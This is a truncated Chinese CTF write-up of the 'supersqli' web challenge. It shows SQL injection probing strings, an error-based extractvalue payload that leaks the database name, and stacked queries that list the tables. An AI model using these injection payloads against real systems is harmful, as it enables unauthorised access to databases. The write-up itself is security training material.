攻防世界web進階區之supersqli

打開題目所給鏈接:首先我們先探測其有無注入: 1’ 報錯 1’# 正常且爲True 1’ and 1=1# 正常且爲True 1’ and 1=2# 正常且爲False 所以它裏邊存在注入。 用1’ or extractvalue(rand(),concat(0x7e,database())) #爆出數據庫名: 用0’; use supersqli; show tables;爆出表明:用0’; u
相關文章
相關標籤/搜索